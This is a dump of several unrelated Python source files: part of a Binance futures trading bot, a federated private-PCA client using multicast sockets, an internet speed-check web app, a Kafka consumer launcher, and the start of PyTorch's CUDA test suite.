TP_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][TP].avgPrice
TP_total = TP_quantity * TP_average_price
SM_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][SM].cumulativeFilledQty
SM_average_price = self.current_position_dict[prefix_id]['relatedOrderID'][SM].avgPrice
SM_total = SM_quantity * SM_average_price
totalSold = TP_total + SM_total
if positionSide.lower() == 'short':
profit = (originalSpend - totalSold - self.current_position_dict[prefix_id]['comission'])
else:
profit = (totalSold - originalSpend - self.current_position_dict[prefix_id]['comission'])
self.__starting_asset_value += profit
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID_not_filled, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderID_not_filled,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
log_string = '\n\n{}\nPNL for this order:\nclientOrderId: {}\npositionSide: {}\nLevel: {}\nentryPrice: {}\nexitPrice: {}\noriginalSpend: {}\ntotalSold: {}\nTakeProfitAmount: {}\n TakeProfitQuantity: {}\n TakeProfitPrice: {}\nStopLossAmount: {}\n StopLossQuantity: {}\n StopLossPrice: {}\nComission: {}\nProfit: {}\nStart Datetime: {}\nFinished Datetime: {}\n{}'.format(
self.margin,
prefix_id,
positionSide.upper(),
self.current_position_dict[prefix_id]['level'],
self.current_position_dict[prefix_id]['entryPrice'],
((TP_total + SM_total)/(TP_quantity + SM_quantity)),
originalSpend,
totalSold,
TP_total, TP_quantity, TP_average_price,
SM_total, SM_quantity, SM_average_price,
self.current_position_dict[prefix_id]['comission'],
profit,
utc_2_datetime(int(prefix_id)/1000),
current_date_time(),
self.margin)
put_to_log(log_string, self.__profit_log_path)
print(log_string)
elif orderStatus == 'CANCELED'.lower():
del self.current_position_dict[prefix_id]
else:
print("\n====================================================================\nReceived an user order:")
PrintMix.print_data(first_order)
put_to_log('\n\nUser order:\n{}\n'.format(convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================\n")
except Exception as e:
log = "\n\n{}\nAn ERROR happend in position handler function: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_status_handler(self):
'''
NEW
PARTIALLY_FILLED 部分成交
FILLED 成交
CANCELED 已撤
CALCULATED
EXPIRED 订单失效
TRADE 交易
'''
while True:
try:
time.sleep(5)
for clientID in self.current_position_dict.keys():
clientOrderID = clientID[:13] + (OrderSide.BUY if self.current_position_dict[clientID]['positionSide'].lower() == 'long' else OrderSide.SELL) + "_" + self.current_position_dict[clientID]['positionSide'].upper() + "_LIMIT"
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > (self.__order_timeout * 6 )) and ( self.current_position_dict[clientID]['entryPrice'] != None ) ):
for orderID in self.current_position_dict[clientID]['relatedOrderID'].keys():
if orderID != clientOrderID:
try:
orderDetail = self.client.futures_get_order(origClientOrderId = orderID, symbol = self.__paried_symbol)
orderDetail['orderStatus'] = orderDetail['status']
orderDetail['cumulativeFilledQty'] = float(orderDetail['executedQty'])
orderDetail['commissionAmount'] = (float(orderDetail['avgPrice']) * float(orderDetail['executedQty'])*0.0004)
orderDetail['lastFilledQty'] = float(orderDetail['executedQty'])
orderDetail['avgPrice'] = float(orderDetail['avgPrice'])
orderDetail = dict2obj(orderDetail)
time.sleep(0.5)
if ( (orderDetail.status.lower() == 'filled') and ( ( orderDetail.type.upper() == 'STOP_MARKET') or ( orderDetail.type.upper() == 'LIMIT') ) ):
time.sleep(1)
if (clientID in self.current_position_dict):
if (self.current_position_dict[clientID]['entryPrice'] != None):
self.order_update_list.append(orderDetail)
time.sleep(3)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while fetching order status: orderID: {} ERROR({}) at {}\n{}\n\n".format(self.margin,
orderID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling/updating position status: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def order_handler(self):
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
}
'''
while True:
try:
for clientID in self.current_position_dict.keys():
clientOrderID = clientID[:13] + (OrderSide.BUY if self.current_position_dict[clientID]['positionSide'].lower() == 'long' else OrderSide.SELL) + "_" + self.current_position_dict[clientID]['positionSide'].upper() + "_LIMIT"
if ( ( ( int(time.time())*1000 - int(clientID[:13] ) ) > self.__order_timeout) and ( self.current_position_dict[clientID]['entryPrice'] == None ) ):
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the timeout order: orderID:{}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
try:
result = self.client.futures_get_order(origClientOrderId = clientOrderID, symbol = self.__paried_symbol)
result['orderStatus'] = result['status']
result['cumulativeFilledQty'] = float(result['executedQty'])
result['commissionAmount'] = (float(result['avgPrice']) * float(result['executedQty'])*0.0004)
result['lastFilledQty'] = float(result['executedQty'])
result['avgPrice'] = float(result['avgPrice'])
result = dict2obj(result)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting information for the timeout order: orderID:{}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientID,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
else:
time.sleep(2)
if (result.status.lower() == 'filled') and (self.current_position_dict[clientID]['entryPrice'] == None):
self.order_update_list.append(result)
# else:
# del self.current_position_dict[clientID]
time.sleep(2)
else:
del self.current_position_dict[clientID]
print("\n\nTimeout order: {} was successfully canceled.".format(clientID))
continue
if ( ( ( self.__acc_profit + self.__starting_asset_value) < 8) and ( len(self.current_position_dict) == 0 ) ):
print('\n\nNot enough balance: {}\n\n'.format( self.__acc_profit + self.__starting_asset_value))
time.sleep(5)
elif len(self.current_position_dict) <2:
recom = self.current_recommendation.copy()
if len(self.current_position_dict) == 1:
# pass
# Uncomment the following if both long and short can exist
current_position_OrderId = list(self.current_position_dict.keys())[0]
current_position_side = self.current_position_dict[current_position_OrderId]['positionSide']
opoPositionSide = (PositionSide.SHORT if current_position_side.upper() == PositionSide.LONG else PositionSide.LONG)
if recom[opoPositionSide.lower()]['level'] > 0:
rec_price = recom[opoPositionSide.lower()]['price']
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
positionSide = opoPositionSide.lower()
level = recom[positionSide]['level']
uniqueOrderId = str(int(current_utc_time()*1000))
self.place_limit_buy(positionSide, level, quantity, rec_price, uniqueOrderId)
elif len(self.current_position_dict) == 0:
if (recom['short']['level'] > 0 or recom['long']['level'] > 0):
if recom['short']['level'] > 0:
posisionSide = 'short'
elif recom['long']['level'] > 0:
posisionSide = 'long'
if (posisionSide == 'long' or posisionSide == 'short'):
rec_price = recom[posisionSide.lower()]['price']
quantity =round((1/rec_price*(self.__starting_asset_value*self.__leverage)),3)
level = recom[posisionSide.lower()]['level']
uniqueOrderId = str(int(current_utc_time()*1000))
self.place_limit_buy(posisionSide, level, quantity, rec_price, uniqueOrderId)
time.sleep(1)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while handling an order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def place_limit_buy(self, positionSide, level, quantity, price, uniqueOrderId):
try:
self.current_position_dict[uniqueOrderId] = {
'uniqueOrderId': uniqueOrderId,
'level': level,
'positionSide': positionSide,
'trigeredPrice': price,
'entryPrice': None,
'exitPrice': None,
'quantity': 0,
'relatedOrderID': {},
'comission': 0
}
orderSide = (OrderSide.BUY if positionSide.lower() == "long" else OrderSide.SELL)
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.LIMIT,
positionSide=positionSide.upper(),
timeInForce = TimeInForce.GTC,
quantity =quantity,
price = round((price * ( (1 + self.__price_anneal) if positionSide.lower() == "long" else ( 1 - self.__price_anneal ) ) ), 2),
# Test price: not for filled
# price = round((price * (0.8 if positionSide.lower() == "long" else 1.2)), 2),
newClientOrderId=uniqueOrderId + orderSide + "_" + positionSide.upper() + "_LIMIT"
)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while placing a limit order: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
del self.current_position_dict[uniqueOrderId]
def cancele_order(self, clientOrderId):
pass
def run(self):
'''
https://www.itranslater.com/qa/details/2583623258847314944
'''
pre_task_finished = self.make_dir()
if pre_task_finished:
self.update_config_info()
t1 = threading.Thread(target=self.start_subscribing)
t2 = threading.Thread(target=self.start_analysing)
t3 = threading.Thread(target=self.start_handler)
t4 = threading.Thread(target=self.check_if_service_avaliable)
task_list = [t1, t2, t3, t4]
for task in task_list:
task.start()
for task in task_list:
task.join()
|
clientPCA.py
|
import threading # Libreria usada para manejar multiples hilos por proceso
import time # Libreria usada para dormir el hilo principal
import random
import socket # Libreria usada para comunicacion entre procesos
import struct # Libreria para manejar bytes como datos desempacados
import numpy as np # Libreria para manejar las matrices
import re # Libreria para manjera expresiones regulares
import ast # Libreria para usa Abstract Syntax Trees
import sys
from pandas import read_csv, DataFrame # Leer csvs
from federatedPCA import SAPCA,privateSAPCA,merge # Algoritmos implementados segun el paper
from sklearn.preprocessing import scale
def str2array(s):
# Remove space after [
s=re.sub('\[ +', '[', s.strip())
# Replace commas and spaces
s=re.sub('[,\s]+', ', ', s)
return np.array(ast.literal_eval(s))
def send(data, port=5007, addr='224.1.1.1'):
"""send(data[, port[, addr]]) - multicasts a UDP datagram."""
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
# Make the socket multicast-aware, and set TTL.
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 2)
# Send the data
s.sendto(data, (addr, port))
def recv(port=5007, addr="224.1.1.1", buf_size=1024):
"""recv([port[, addr[,buf_size]]]) - waits for a datagram and returns the data."""
# Create the socket
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,socket.IPPROTO_UDP)
# Set some options to make it multicast-friendly
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except AttributeError:
pass # Some systems don't support SO_REUSEPORT
s.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_TTL, 20)
s.setsockopt(socket.SOL_IP, socket.IP_MULTICAST_LOOP, 1)
s.settimeout(random.randint(4,8))
# Bind to the port
s.bind(('', port))
mreq = struct.pack("4sl", socket.inet_aton(addr), socket.INADDR_ANY)
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)
# Receive the data, then unregister multicast receive membership, then close the port
data,send_addr = s.recvfrom(buf_size)
s.setsockopt(socket.SOL_IP, socket.IP_DROP_MEMBERSHIP, socket.inet_aton(addr) + socket.inet_aton('0.0.0.0'))
s.close()
return data
def Participante(currentU,currentS,currentR,q):
# Bandera para indicar si el proceso ya fue participante en algun momento.
# en caso de serlo la ejecucion se detiene.
yaFuiParticipante = False
print("Soy participante")
while soyParticipante:
try:
invitacion=recv()
puertoDeMiLider=int(invitacion.split()[1])
# Llego una invitacion de otro lider.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Se inicia la comuniciacion para transmitir las estimaciones actuales.
s.connect((TCP_IP, puertoDeMiLider))
cadAEnviar=np.array_str(currentU)+"/"+np.array_str(currentS)+"/"+str(currentR)
# Se envia el mensaje codificado
s.send(cadAEnviar)
#s.close()
# Se finaliza la comunicacion y se establece la bandera como verdadera.
yaFuiParticipante = True
break
except socket.timeout:
continue
except Exception as e:
print("Excepcion de participacion", e)
q.append(yaFuiParticipante)
return
np.set_printoptions(threshold=sys.maxsize)
soyParticipante = False
TCP_IP = '127.0.0.1' # Direccion IP local para comunicacion entre procesos via TCP y UDP
BUFFER_SIZE = 1024 # Tamanio del buffer de comunicacion
private=True # Bandera que especifica si usar SAPCA o private SAPCA
b=11
epsilon=4
delta=.4
alfa=.1
beta=.2
currentR=5 # Estimacion inicial del rango
dataSetName='wine'
i=raw_input()
data = read_csv('./datasets/'+dataSetName+i+'.csv') # Lectura de los datos parcial de un conjunto de datos
data = DataFrame(scale(data), index=data.index, columns=data.columns)
XMat = data.rename_axis('ID').values # Se convierten los datos en una matriz.
XMat=XMat.T # Se transpone la matriz para ser consistente con el paper.
if private:
currentR,currentU,currentS=privateSAPCA(currentR,XMat,b,alfa,beta,epsilon,delta) # Se calculan las direcciones principales con los datos disponibles
else:
currentR,currentU,currentS=SAPCA(currentR,XMat,b,alfa,beta)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Se crea un socket para establecer comunicaciones cliente a cliente
s.bind((TCP_IP, 0))
puertoLider = s.getsockname()[1] # Se guarda el puerto del socket para comunicacion multicast
s.settimeout(2) # Se define el tiempo por el cual el proceso buscara ser lider.
# Despues de este tiempo el proceso dormira y entrara en modo participante.
while 1:
# Se guardan las estimaciones actuales de U y S
if private:
np.save('currentUPrivate'+dataSetName, currentU)
np.save('currentSPrivate'+dataSetName, currentS)
else:
np.save('currentU'+dataSetName, currentU)
np.save('currentS'+dataSetName, currentS)
print("Soy Lider")
time.sleep(1)
send("lider "+str(puertoLider)) # Se le manda una invitacion a todos los participantes.
try:
s.listen(1)
conn, addr = s.accept()
# Si el cliente recibe una conexion significa que un participante le enviara su estimacion
# actual de U y S por lo que se hara un merge.
mensajeReconstruido = ""
while 1:
time.sleep(.1)
data = conn.recv(BUFFER_SIZE)
if not data: break
mensajeReconstruido+=data
time.sleep(.5)# dormir antes de cerrar la conexion para evitar los broken pipes
conn.close() # se cierra la conexion
# Se decodificaran las matrices obtenidas del mensaje
matrices = mensajeReconstruido.split('/')
incomingU=str2array(matrices[0])
incomingS=str2array(matrices[1])
incomingR=int(matrices[2])
# Se hace un merge con las nuevas matrices.
currentU,currentS=merge(max(currentR,incomingR),currentU,currentS,incomingU,incomingS)
currentR = max(incomingR,currentR)
except socket.timeout:
# Si no se han obtenido respuestas el hilo entra en modo participante.
soyParticipante=True
q=list()
thread1 = threading.Thread(target = Participante, args = (currentU,currentS,currentR, q))
thread1.start()
# Duerme un tiempo aleatorio para evitar deadlocks.
time.sleep(random.randint(5,10))
soyParticipante=False
# Si el hilo sigue enviando algo permite que se termine el envio antes de resumir
# en modo lider.
while(thread1.isAlive()):
time.sleep(1)
if q.pop():
break
except Exception as e:
print("Excepcion de lider",e)
|
core.py
|
#!/usr/bin/env python
from __future__ import absolute_import, division, print_function
# HTTP / HTML
import tornado
import tornado.wsgi
import tornado.httpserver
# Intercheck
from . import utils
from . import routes
# Python built-in
import webbrowser
import threading
import logging
import httplib
import socket
import time
import os
# Configure the logger
print = logging.warning
utils.configure_logging()
# Get a handle on the APP
APP = routes.APP
def background(settings_filepath, min_interval_connected=60.0,
min_interval_disconnected=30.0, force_check_interval=1,
debug=True):
duration_run_avg = None
while True:
# Load settings
settings_dict = utils.load_settings(quiet=True)
interval = settings_dict.get('interval')
interval_exact = settings_dict.get('interval_exact')
# Check the interval to make sure it is reasonable
if interval < min_interval_connected:
print('Warning, interval less than 1 minute (minimum interval)')
interval = max(min_interval_connected, interval)
if interval < duration_run_avg:
print('Warning, interval less than average duration')
# Run SpeedTest
APP.status.discard('waiting')
APP.status.add('testing')
result_dict = speedtest()
APP.status.discard('testing')
APP.status.add('waiting')
# Check for success
success = result_dict.get('success')
if success:
APP.status.discard('disconnected')
APP.status.add('connected')
else:
APP.status.discard('connected')
APP.status.add('disconnected')
interval = min_interval_disconnected
# Get duration and update running average
duration = result_dict.get('duration')
if duration_run_avg is None:
duration_run_avg = duration
else:
duration_run_avg = (duration_run_avg + duration) * 0.5
# Calculate the timeout
timeout = max(0, interval - duration)
current = time.time()
future = current + timeout
# Correct for Intercheck overhead, round timeout to the nearest minute
offset = 0.0
if interval_exact:
near_interval = 60.0 if success else min_interval_disconnected
nearest = round(future / near_interval) * near_interval
offset = nearest - future
# Correct timeout and future
timeout += offset
future += offset
# Output results of the SpeedTest
time_str = time.strftime('%D %H:%M:%S', time.localtime(future))
if debug:
args = (interval, offset, duration_run_avg, )
additional = ' (interval %0.2f, offset %0.2f, avg. %0.3f)' % args
else:
additional = ''
args = (timeout, time_str, additional)
print('Waiting for next check in %0.2f sec. at %s%s' % args)
# Sleep for the timeout duration, checking for the force file
while timeout > 0:
timeout_small = min(force_check_interval, timeout)
timeout -= timeout_small
if utils.check_force():
print('Forcing...')
break
time.sleep(timeout_small)
def start_background(settings_filepath):
if hasattr(APP, 'background_thread') and APP.background_thread is not None:
print('Cannot start the background process, already running')
return
args = [settings_filepath]
APP.background_thread = threading.Thread(target=background, args=args)
APP.background_thread.setDaemon(True)
APP.background_thread.start()
APP.background_thread.join(0)
def speedtest(verbose=True):
# Ensure we have the speedtest-cli to use
find_speedtest(quiet=True)
# Start the SpeedTest
if verbose:
print('Performing SpeedTest...')
start, duration, ping, download, upload = None, None, None, None, None
with utils.Timer() as timer:
try:
with os.popen(' '.join([APP.server_cli, '--simple'])) as response:
for line in response:
line = line.strip().split()
if len(line) == 3:
try:
key, value = line[:2]
value = float(value)
if key.startswith('Ping'):
ping = value
if key.startswith('Download'):
download = value
if key.startswith('Upload'):
upload = value
except IndexError:
pass
except ValueError:
pass
except httplib.BadStatusLine:
pass
except Exception as unexpected:
print('\n\nCAUGHT UNEXPECTED EXCEPTION: %r\n\n' % (unexpected, ))
pass
# Compile the results, possibly print
start = timer.start
duration = timer.duration
if verbose:
ping_str = 'ERROR\t\t' if ping is None else '%0.03f ms' % (ping, ) # NOQA
download_str = 'ERROR\t\t' if download is None else '%0.03f Mb/s' % (download, ) # NOQA
upload_str = 'ERROR' if upload is None else '%0.03f Mb/s' % (upload, ) # NOQA
message = '\tPing: %s\tDownload: %s\tUpload: %s'
args = (ping_str, download_str, upload_str, )
print(message % args)
message = '\tDuration: %0.03f sec.\tPerformed: %s'
time_str = time.strftime('%D %H:%M:%S', time.localtime(start))
args = (duration, time_str, )
print(message % args)
print('...done')
# Create results dict
# Yay, DeMorgan
failure = ping is None or download is None or upload is None
result_dict = {
'start' : start,
'duration' : duration,
'ping' : ping,
'download' : download,
'upload' : upload,
'success' : not failure,
}
# Write results to log(s)
utils.write_to_logs(**result_dict)
return result_dict
def find_speedtest(command='speedtest-cli', quiet=False):
# Check to see if speedtest-cli has already been found
if hasattr(APP, 'server_cli') and APP.server_cli is not None:
if not quiet:
print('Cached %s (%s)' % (command, APP.server_cli, ))
return
# Find speedtest-cli using bash 'which'
with os.popen(' '.join(['which', command])) as response:
for line in response:
line = line.strip()
if len(line) > 0 and line.endswith(command):
APP.server_cli = os.path.abspath(line)
print('Found %s (%s)' % (command, APP.server_cli, ))
break # Gaurantee only first line is processed
else:
message = 'Command line interface %r cannot be found, ' + \
'install using \'pip install speedtest-cli\''
raise RuntimeError(message % (command, ))
def start(**kwargs):
# Configure the command line argument parser
cl_settings_dict = utils.configure_argparser()
# Load last settings from disk, if first time load default settings in utils
settings_dict = utils.load_settings(quiet=True)
# Update settings with command line argument settings
settings_dict.update(cl_settings_dict)
# Update settings with instance-specific settings
settings_dict.update(kwargs)
# Save settings
utils.save_settings(settings_dict, quiet=False)
# Determine the IP address
try:
APP.server_ip_address = socket.gethostbyname(socket.gethostname())
except socket.gaierror:
APP.server_ip_address = '127.0.0.1'
APP.server_port = settings_dict.get('port')
# Initialize the web handler
try:
wsgi_container = tornado.wsgi.WSGIContainer(APP)
http_server = tornado.httpserver.HTTPServer(wsgi_container)
http_server.listen(APP.server_port)
except socket.error:
args = (APP.server_port, )
print('Cannot start Intercheck on port %d, already in use' % args)
return
# Determine the URL for this server
url = 'http://%s:%s' % (APP.server_ip_address, APP.server_port)
print('Intercheck starting at %s' % (url,))
# Open URL in default browser
print('Opening Intercheck using system\'s default browser')
webbrowser.open(url)
# Start the IO loop, blocking
start_background('')
tornado.ioloop.IOLoop.instance().start()
if __name__ == '__main__':
start()
|
app.py
|
#!/bin/python
import logging
from multiprocessing import Process
from models.metric_manager import MetricManager
from kafkawrapper.consumer import consume
log = logging.getLogger('file')
# Starts the kafka consumer in a different thread
def start_consumer():
# with ulca_dataset_validate.test_request_context():
try:
consumer_process = Process(target=consume)
consumer_process.start()
except Exception as e:
log.exception(f'Exception while starting the ULCA Model Metric Eval kafka consumer: {str(e)}')
if __name__ == '__main__':
metric_mgr = MetricManager.getInstance()
metric_mgr.load_metrics()
start_consumer()
|
test_cuda.py
|
from itertools import repeat, chain, product
from typing import NamedTuple
import collections
import contextlib
import ctypes
import gc
import io
import pickle
import queue
import sys
import tempfile
import threading
import unittest
import torch
import torch.cuda
import torch.cuda.comm as comm
from torch.nn.parallel import scatter_gather
from torch.utils.checkpoint import checkpoint_sequential
from torch._six import inf, nan
from test_torch import AbstractTestCases
from torch.testing._internal.common_methods_invocations import tri_tests_args, tri_large_tests_args, \
_compare_trilu_indices, _compare_large_trilu_indices
from torch.testing._internal.common_utils import TestCase, freeze_rng_state, run_tests, \
NO_MULTIPROCESSING_SPAWN, skipIfRocm, load_tests, IS_REMOTE_GPU, IS_SANDCASTLE, IS_WINDOWS, \
slowTest, skipCUDANonDefaultStreamIf, skipCUDAMemoryLeakCheckIf, TEST_WITH_ROCM, TEST_NUMPY
from torch.testing._internal.autocast_test_lists import AutocastTestLists
# load_tests from common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA and TEST_MULTIGPU from torch.testing._internal.common_cuda here,
# because if we do that, the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed
# multiple times as well during the execution of this test suite, and it will
# cause CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
TEST_MULTIGPU = TEST_CUDA and torch.cuda.device_count() >= 2
if not TEST_CUDA:
print('CUDA not available, skipping tests', file=sys.stderr)
TestCase = object # noqa: F811
TEST_LARGE_TENSOR = TEST_CUDA
TEST_MEDIUM_TENSOR = TEST_CUDA
TEST_CUDNN = TEST_CUDA
if TEST_CUDA:
torch.ones(1).cuda() # initialize cuda context
TEST_CUDNN = TEST_CUDA and (TEST_WITH_ROCM or
torch.backends.cudnn.is_acceptable(torch.tensor(1., device=torch.device('cuda:0'))))
TEST_LARGE_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 12e9
TEST_MEDIUM_TENSOR = torch.cuda.get_device_properties(0).total_memory >= 6e9
types = [
torch.FloatTensor,
torch.DoubleTensor,
torch.LongTensor,
torch.IntTensor,
torch.ShortTensor,
torch.CharTensor,
torch.ByteTensor,
torch.HalfTensor,
]
def make_sparse_tensor(t, n, *sizes):
assert t.is_sparse
tensor = t()
i = tensor._indices()
i = i.new(len(sizes), n).copy_(
torch.cat([torch.LongTensor(1, n).random_(s) for s in sizes], 0))
v = tensor._values()
v = v.new(n).copy_(torch.randn(n))
return t(i, v, torch.Size(sizes))
_cycles_per_ms = None
def get_cycles_per_ms():
"""Approximate number of cycles per millisecond for torch.cuda._sleep"""
global _cycles_per_ms
if _cycles_per_ms is None:
start = torch.cuda.Event(enable_timing=True)
end = torch.cuda.Event(enable_timing=True)
start.record()
torch.cuda._sleep(1000000)
end.record()
end.synchronize()
_cycles_per_ms = 1000000 / start.elapsed_time(end)
return _cycles_per_ms
class TestCuda(TestCase):
_do_cuda_memory_leak_check = True
_do_cuda_non_default_stream = True
FIFTY_MIL_CYCLES = 50000000
def setUp(self):
super(TestCuda, self).setUp()
self.autocast_lists = AutocastTestLists(torch.device('cuda:0'))
def tearDown(self):
del self.autocast_lists
super(TestCuda, self).tearDown()
def _check_memory_stat_consistency(self):
snapshot = torch.cuda.memory_snapshot()
expected_each_device = collections.defaultdict(lambda: collections.defaultdict(int))
for segment in snapshot:
expected = expected_each_device[segment["device"]]
pool_str = segment["segment_type"] + "_pool"
expected["segment.all.current"] += 1
expected["segment." + pool_str + ".current"] += 1
expected["allocated_bytes.all.current"] += segment["allocated_size"]
expected["allocated_bytes." + pool_str + ".current"] += segment["allocated_size"]
expected["reserved_bytes.all.current"] += segment["total_size"]
expected["reserved_bytes." + pool_str + ".current"] += segment["total_size"]
expected["active_bytes.all.current"] += segment["active_size"]
expected["active_bytes." + pool_str + ".current"] += segment["active_size"]
is_split = len(segment["blocks"]) > 1
for block in segment["blocks"]:
if block["state"] == "active_allocated":
expected["allocation.all.current"] += 1
expected["allocation." + pool_str + ".current"] += 1
if block["state"].startswith("active_"):
expected["active.all.current"] += 1
expected["active." + pool_str + ".current"] += 1
if block["state"] == "inactive" and is_split:
expected["inactive_split.all.current"] += 1
expected["inactive_split." + pool_str + ".current"] += 1
expected["inactive_split_bytes.all.current"] += block["size"]
expected["inactive_split_bytes." + pool_str + ".current"] += block["size"]
for device, expected in expected_each_device.items():
stats = torch.cuda.memory_stats(device)
for k, v in expected.items():
self.assertEqual(v, stats[k])
@staticmethod
def _test_memory_stats_generator(self, device=None, N=35):
if device is None:
device = torch.cuda.current_device()
m0 = torch.cuda.memory_allocated(device)
last_m_arr = [torch.cuda.memory_allocated(device)]
max_m_arr = [torch.cuda.max_memory_allocated(device)]
last_r_arr = [torch.cuda.memory_reserved(device)]
max_r_arr = [torch.cuda.max_memory_reserved(device)]
def alloc(*size):
with torch.cuda.device(device):
# NOTE: do **not** use methods that can have additional
# memory overhead, e.g., inplace random sampling methods.
# they can leave some memory occupied even after being
# deallocated, e.g., initialized RNG state, causing some
# memory checks below to fail.
return torch.cuda.FloatTensor(*size)
def assert_change(comp=1, empty_cache=False, reset_peak=False):
# comp > 0: increased
# comp = 0: equal
# comp < 0: decreased
new_m = torch.cuda.memory_allocated(device)
new_max_m = torch.cuda.max_memory_allocated(device)
if comp > 0:
self.assertGreater(new_m, last_m_arr[0])
elif comp < 0:
self.assertLess(new_m, last_m_arr[0])
else:
self.assertEqual(new_m, last_m_arr[0])
self.assertLessEqual(new_m, new_max_m)
self.assertGreaterEqual(new_max_m, max_m_arr[0])
last_m_arr[0] = new_m
max_m_arr[0] = new_max_m
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
# emptying cache may happen (due to allocation or empty_cache), so
# we can't assert new_c >= last_c
self.assertLessEqual(new_r, new_max_r)
self.assertGreaterEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
max_r_arr[0] = new_max_r
if empty_cache:
torch.cuda.empty_cache()
new_r = torch.cuda.memory_reserved(device)
new_max_r = torch.cuda.max_memory_reserved(device)
self.assertLessEqual(new_r, last_r_arr[0])
self.assertLessEqual(new_r, new_max_r)
self.assertEqual(new_max_r, max_r_arr[0])
last_r_arr[0] = new_r
if reset_peak:
torch.cuda.reset_peak_memory_stats(device)
self.assertEqual(torch.cuda.memory_allocated(device), last_m_arr[0])
self.assertEqual(torch.cuda.max_memory_allocated(device), last_m_arr[0])
max_m_arr[0] = last_m_arr[0]
self.assertEqual(torch.cuda.memory_reserved(device), last_r_arr[0])
self.assertEqual(torch.cuda.max_memory_reserved(device), last_r_arr[0])
max_r_arr[0] = last_r_arr[0]
assert_change(0)
assert_change(0, reset_peak=True)
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
assert_change(0)
yield
tensors1 = [alloc(1), alloc(10, 20), alloc(200, 300, 2000)]
m1 = torch.cuda.memory_allocated(device)
assert_change(1)
yield
tensors2 = []
for i in range(1, int(N / 2) + 1):
# small ones
tensors2.append(alloc(i, i * 4))
assert_change(1)
yield
for i in range(5, int(N / 2) + 5):
# large ones
tensors2.append(alloc(i, i * 7, i * 9, i * 11))
assert_change(1, reset_peak=(i % 2 == 0))
yield
tensors2.append(alloc(0, 0, 0))
assert_change(0)
yield
permute = []
for i in torch.randperm(len(tensors2)):
permute.append(tensors2[i])
assert_change(0)
yield
del tensors2
assert_change(0)
yield
tensors2 = permute
assert_change(0)
yield
del permute
assert_change(0, reset_peak=True)
yield
for i in range(int(N / 2)):
x = tensors2[i].numel()
del tensors2[i]
assert_change(-x) # in case that tensors2[i] is empty
yield
for i in range(2, int(2 * N / 3) + 2):
tensors2.append(alloc(i, i * 3, i * 8))
assert_change(1)
yield
del tensors2
assert_change(-1, reset_peak=True)
assert_change(0)
self.assertEqual(torch.cuda.memory_allocated(device), m1)
yield True
del tensors1
assert_change(-1, reset_peak=True)
self.assertEqual(torch.cuda.memory_allocated(device), m0)
# test empty_cache and reset_peak
assert_change(0, empty_cache=True)
assert_change(0, reset_peak=True)
def test_cudart_register(self):
t = torch.ones(20)
self.assertFalse(t.is_pinned())
cudart = torch.cuda.cudart()
r = cudart.cudaHostRegister(t.data_ptr(), t.numel() * t.element_size(), 0)
self.assertEqual(r, 0)
self.assertTrue(t.is_pinned())
r = cudart.cudaHostUnregister(t.data_ptr())
self.assertEqual(r, 0)
self.assertFalse(t.is_pinned())
